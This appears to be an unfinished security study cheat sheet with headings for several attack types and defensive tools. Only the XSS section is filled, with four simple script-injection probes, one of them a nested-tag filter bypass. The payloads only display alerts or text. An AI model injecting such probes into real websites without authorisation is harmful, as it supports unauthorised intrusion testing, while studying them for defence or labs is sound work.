########################################################################################################
XSS injection: 
<script type="text/javascript">alert('Ciao');</script>
<script type="text/javascript">document.write("Ciao")</script>
<h1>Ciao</h1>
<ScRi<ScRiPt>alert('ciao 2');</ScRiPt>Pt>alert('ciao 1');</ScRiPt>

######################################################################################################## 
SQL injection:


########################################################################################################
COMMAND injection:


########################################################################################################
Privilege escalation:


########################################################################################################
Suricata:


########################################################################################################
Iptables:


########################################################################################################
